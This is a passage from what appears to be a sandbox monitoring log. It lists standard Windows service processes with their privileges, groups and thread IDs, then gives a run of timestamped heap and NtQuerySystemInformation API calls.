0x31c Thread: id = 415 os_tid = 0x30c Thread: id = 416 os_tid = 0x2f4 Thread: id = 417 os_tid = 0x2a8 Process: id = "26" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x74d18000" os_pid = "0x304" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:00008d78" [0xc000000f], "LOCAL" [0x7] Thread: id = 418 os_tid = 0x9ac Thread: id = 419 os_tid = 0x9a8 Thread: id = 420 os_tid = 0x950 Thread: id = 421 os_tid = 0x94c Thread: id = 422 os_tid = 0x93c Thread: id = 423 os_tid = 0x938 Thread: id = 424 os_tid = 0x934 Thread: id = 425 os_tid = 0x928 Thread: id = 426 os_tid = 0x924 Thread: id = 427 os_tid = 0x91c Thread: id = 428 os_tid = 0x640 Thread: id = 429 os_tid = 0x63c Thread: id = 430 os_tid = 0x630 Thread: id = 431 os_tid = 0x628 Thread: id = 432 os_tid = 0x3c8 Thread: id = 433 os_tid = 0x344 Thread: id = 434 os_tid = 0x338 Thread: id = 435 os_tid = 0x334 Thread: id = 436 os_tid = 0x324 Thread: id = 437 os_tid = 0x320 Thread: id = 438 os_tid = 0x318 Thread: id = 439 os_tid = 0x308 Process: id = "27" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x74331000" os_pid = "0x3c0" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xa], "NT SERVICE\\CoreMessagingRegistrar" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f63" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 440 os_tid = 0x11e4 Thread: id = 441 os_tid = 0xa60 Thread: id = 442 os_tid = 0xa5c Thread: id = 443 os_tid = 0xa58 Thread: id = 444 os_tid = 0xa34 Thread: id = 445 os_tid = 0xa1c Thread: id = 446 os_tid = 0xa18 Thread: id = 447 os_tid = 0x9f8 Thread: id = 448 os_tid = 0x8ec Thread: id = 449 os_tid = 0x8e8 Thread: id = 450 os_tid = 0x87c Thread: id = 451 os_tid = 0x870 Thread: id = 452 os_tid = 0x838 Thread: id = 453 os_tid = 0x834 Thread: id = 454 os_tid = 0x814 Thread: id = 455 os_tid = 0x7a8 Thread: id = 456 os_tid = 0x78c Thread: id = 457 os_tid = 0x7e0 Thread: id = 458 os_tid = 0x7f4 Thread: id = 459 os_tid = 0x694 Thread: id = 460 os_tid = 0x7d4 Thread: id = 461 os_tid = 0x7cc Thread: id = 462 os_tid = 0x7c8 Thread: id = 463 os_tid = 0x7c4 Thread: id = 464 os_tid = 0x65c Thread: id = 465 os_tid = 0x15c Thread: id = 466 os_tid = 0x3c4 Process: id = "28" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x735ee000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\HvHost" [0xa], "S-1-5-80-2355113075-3359631449-3346493237-3667020425-1655874352" [0xa], "NT SERVICE\\irmon" [0xa], "NT SERVICE\\NcbService" [0xe], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\NgcSvc" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a4e4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 467 os_tid = 0xe60 Thread: id = 468 os_tid = 0xe5c Thread: id = 469 os_tid = 0x898 Thread: id = 470 os_tid = 0x894 Thread: id = 471 os_tid = 0x890 Thread: id = 472 os_tid = 0x88c Thread: id = 473 os_tid = 0x878 Thread: id = 474 os_tid = 0x5ac Thread: id = 475 os_tid = 0x548 Thread: id = 476 os_tid = 0x540 Thread: id = 477 os_tid = 0x4e0 Thread: id = 478 os_tid = 0x4bc Thread: id = 479 os_tid = 0x290 Thread: id = 480 os_tid = 0x164 Thread: id = 481 os_tid = 0x3fc Thread: id = 662 os_tid = 0x1238 Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x566ab000" os_pid = "0x350" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xe], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "S-1-5-80-2226967063-754826275-1661302337-2802353169-2369347280" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "S-1-5-80-3916113136-2435487254-2535488001-4050622930-2364918814" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b10d" [0xc000000f], "LOCAL" [0x7] Thread: id = 482 os_tid = 0xf54 Thread: id = 483 os_tid = 0xcbc Thread: id = 484 os_tid = 0xc24 Thread: id = 485 os_tid = 0xc10 Thread: id = 486 os_tid = 0xc0c Thread: id = 487 os_tid = 0xc08 Thread: id = 488 os_tid = 0xc04 Thread: id = 489 os_tid = 0xbd0 Thread: id = 490 os_tid = 0x9dc Thread: id = 491 os_tid = 0x544 Thread: id = 492 os_tid = 0x6f4 Thread: id = 493 os_tid = 0xbcc Thread: id = 494 os_tid = 0x4dc Thread: id = 495 os_tid = 0x490 Thread: id = 496 os_tid = 0x4c4 Thread: id = 497 os_tid = 0x9d4 Thread: id = 498 os_tid = 0x8f4 Thread: id = 499 os_tid = 0x700 Thread: id = 500 os_tid = 0x538 Thread: id = 501 os_tid = 0x534 Thread: id = 502 os_tid = 0x530 Thread: id = 503 os_tid = 0x500 Thread: id = 504 os_tid = 0x4b8 Thread: id = 505 os_tid = 0x498 Thread: id = 506 os_tid = 0x47c Thread: id = 507 os_tid = 0x478 Thread: id = 508 os_tid = 0x474 Thread: id = 509 os_tid = 0x470 Thread: id = 510 os_tid = 0x46c Thread: id = 511 os_tid = 0x468 Thread: id = 512 os_tid = 0x448 Thread: id = 513 os_tid = 0x424 Thread: id = 514 os_tid = 0x420 Thread: id = 515 os_tid = 0x364 Thread: id = 657 os_tid = 0x11d4 Thread: id = 658 os_tid = 0x13f8 Thread: id = 692 os_tid = 0xf00 Thread: id = 694 os_tid = 0x100c Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x667bb000" os_pid = "0x434" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k NetworkService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xa], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xe], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bd29" [0xc000000f], "LOCAL" [0x7] Thread: id = 516 os_tid = 0x12c0 Thread: id = 517 os_tid = 0x12e0 Thread: id = 518 os_tid = 0x127c Thread: id = 519 os_tid = 0x1278 Thread: id = 520 os_tid = 0xfcc Thread: id = 521 os_tid = 0xfc8 Thread: id = 522 os_tid = 0xeec Thread: id = 523 os_tid = 0xed8 Thread: id = 524 os_tid = 0x6b8 Thread: id = 525 os_tid = 0x864 Thread: id = 526 os_tid = 0x674 Thread: id = 527 os_tid = 0x658 Thread: id = 528 os_tid = 0x4d4 Thread: id = 529 os_tid = 0x4d0 Thread: id = 530 os_tid = 0x4cc Thread: id = 531 os_tid = 0x4c8 Thread: id = 532 os_tid = 0x4c0 Thread: id = 533 os_tid = 0x494 Thread: id = 534 os_tid = 0x48c Thread: id = 535 os_tid = 0x488 Thread: id = 536 os_tid = 0x464 Thread: id = 537 os_tid = 0x45c Thread: id = 538 os_tid = 0x458 Thread: id = 539 os_tid = 0x454 Thread: id = 540 os_tid = 0x450 Thread: id = 541 os_tid = 0x438 Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x57af0000" os_pid = "0x554" os_integrity_level = "0x4000" os_privileges = "0x20800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000ec56" [0xc000000f], "LOCAL" [0x7] Thread: id = 542 os_tid = 0x132c Thread: id = 543 os_tid = 0x584 Thread: id = 544 os_tid = 0x580 Thread: id = 545 os_tid = 0x57c Thread: id = 546 os_tid = 0x578 Thread: id = 547 os_tid = 0x574 Thread: id = 548 os_tid = 0x570 Thread: id = 549 os_tid = 0x558 Thread: id = 660 os_tid = 0xe88 Thread: id = 668 os_tid = 0x824 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4f8fa000" os_pid = "0x590" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-4071458001-3563271761-1846288968-3700919931-3809667977" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000f41a" [0xc000000f], "LOCAL" [0x7] Thread: id = 550 os_tid = 0xcc0 Thread: id = 551 os_tid = 0xc30 Thread: id = 552 os_tid = 0x8e4 Thread: id = 553 os_tid = 0x8e0 Thread: id = 554 os_tid = 0x594 Process: id = "33" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27b000" os_pid = "0x598" os_integrity_level = "0x4000" os_privileges = "0x20800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Wcmsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000f421" [0xc000000f], "LOCAL" [0x7] Thread: id = 555 os_tid = 0x68c Thread: id = 556 os_tid = 0x66c Thread: id = 557 os_tid = 0x624 Thread: id = 558 os_tid = 0x614 Thread: id = 559 os_tid = 0x60c Thread: id = 560 os_tid = 0x608 Thread: id = 561 os_tid = 0x604 Thread: id = 562 os_tid = 0x600 Thread: id = 563 os_tid = 0x5d4 Thread: id = 564 os_tid = 0x59c Process: id = "34" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x4ac0c000" os_pid = "0x5e8" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\spoolsv.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:0001010e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 565 os_tid = 0x2d4 Thread: id = 566 os_tid = 0x1148 Thread: id = 567 os_tid = 0x112c Thread: id = 568 os_tid = 0x1138 Thread: id = 569 os_tid = 0x115c Thread: id = 570 os_tid = 0xe8c Thread: id = 571 os_tid = 0x110c Thread: id = 572 os_tid = 0x1124 Thread: id = 573 os_tid = 0x1118 Thread: id = 574 os_tid = 0x634 Thread: id = 575 os_tid = 0x620 Thread: id = 576 os_tid = 0x618 Thread: id = 577 os_tid = 0x610 Thread: id = 578 os_tid = 0x5ec Process: id = "35" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4f046000" os_pid = "0x69c" os_integrity_level = "0x4000" os_privileges = "0x860814080" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k wsappx" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppXSvc" [0xe], "NT SERVICE\\ClipSVC" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001205b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 579 os_tid = 0x7d0 Thread: id = 580 os_tid = 0x6b4 Thread: id = 581 os_tid = 0x6b0 Thread: id = 582 os_tid = 0x6a8 Thread: id = 583 os_tid = 0x6a0 Thread: id = 651 os_tid = 0x1130 Thread: id = 652 os_tid = 0x5f0 Thread: id = 655 os_tid = 0xf40 Thread: id = 656 os_tid = 0xed4 Thread: id = 661 os_tid = 0x13fc Thread: id = 699 os_tid = 0x778 Process: id = "36" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4dab9000" os_pid = "0x720" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 584 os_tid = 0xeac Thread: id = 585 os_tid = 0x1390 Thread: id = 586 os_tid = 0xe9c Thread: id = 587 os_tid = 0xcc4 Thread: id = 588 os_tid = 0x6d4 Thread: id = 589 os_tid = 0x74c Thread: id = 590 os_tid = 0x7dc Thread: id = 591 os_tid = 0x7b4 Thread: id = 592 os_tid = 0x76c Thread: id = 593 os_tid = 0x768 Thread: id = 594 os_tid = 0x754 Thread: id = 595 os_tid = 0x750 Thread: id = 596 os_tid = 0x748 Thread: id = 597 os_tid = 0x724 Thread: id = 664 os_tid = 0x480 Thread: id = 666 os_tid = 0x1250 Thread: id = 667 os_tid = 0x11bc Process: id = "37" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x465e2000" os_pid = "0x818" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 598 os_tid = 0x908 Thread: id = 599 os_tid = 0xefc Thread: id = 600 os_tid = 0xe80 Thread: id = 601 os_tid = 0xe68 Thread: id = 602 os_tid = 0xb6c Thread: id = 603 os_tid = 0xa68 Thread: id = 604 os_tid = 0xa48 Thread: id = 605 os_tid = 0xa3c Thread: id = 606 os_tid = 0xa04 Thread: id = 607 os_tid = 0xa00 Thread: id = 608 os_tid = 0x9f4 Thread: id = 609 os_tid = 0x9f0 Thread: id = 610 os_tid = 0x9ec Thread: id = 611 os_tid = 0x9e4 Thread: id = 612 os_tid = 0x9c8 Thread: id = 613 os_tid = 0x858 Thread: id = 614 os_tid = 0x828 Thread: id = 615 os_tid = 0x81c Process: id = "38" image_name = "securityhealthservice.exe" filename = "c:\\windows\\system32\\securityhealthservice.exe" page_root = "0x4aae8000" os_pid = "0x84c" os_integrity_level = "0x4000" os_privileges = "0x20900080" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\SecurityHealthService.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-259296475-4084429506-1152984619-38739575-565535606" [0xe], "NT AUTHORITY\\Logon Session 00000000:000180f8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 616 os_tid = 0x994 Thread: id = 617 os_tid = 0x990 Thread: id = 618 os_tid = 0x98c Thread: id = 619 os_tid = 0x8d4 Thread: id = 620 os_tid = 0x850 Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1462d000" os_pid = "0x1264" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00064d2b" [0xc000000f], "LOCAL" [0x7] Thread: id = 621 os_tid = 0x12e8 Thread: id = 622 os_tid = 0x12e4 Thread: id = 623 os_tid = 0x12dc Thread: id = 624 os_tid = 0x12cc Thread: id = 625 os_tid = 0x12c4 Thread: id = 626 os_tid = 0x12bc Thread: id = 627 os_tid = 0x129c Thread: id = 628 os_tid = 0x1268 Process: id = "40" image_name = "trustedinstaller.exe" filename = "c:\\windows\\servicing\\trustedinstaller.exe" page_root = "0x6cdd000" os_pid = "0xd08" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\servicing\\TrustedInstaller.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:000742f4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 629 os_tid = 0xddc Thread: id = 630 os_tid = 0xd88 Thread: id = 631 os_tid = 0xd70 Thread: id = 632 os_tid = 0xd40 Thread: id = 633 os_tid = 0xd48 Thread: id = 634 os_tid = 0xd60 Thread: id = 635 os_tid = 0xd04 Process: id = "41" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x184f0000" os_pid = "0xda8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\sppsvc.exe" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000766d2" [0xc000000f], "LOCAL" [0x7] Thread: id = 636 os_tid = 0x12b4 [0226.475] GetProcessHeap () returned 0x2026c630000 [0226.475] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026c66d320 [0226.475] GetProcessHeap () returned 0x2026c630000 [0226.475] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65a530 [0226.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe6d0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe6d0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe6d0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe5c0, Length=0x50, ResultLength=0x0) [0226.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0226.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe320, Length=0x28, ResultLength=0x0) [0226.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, 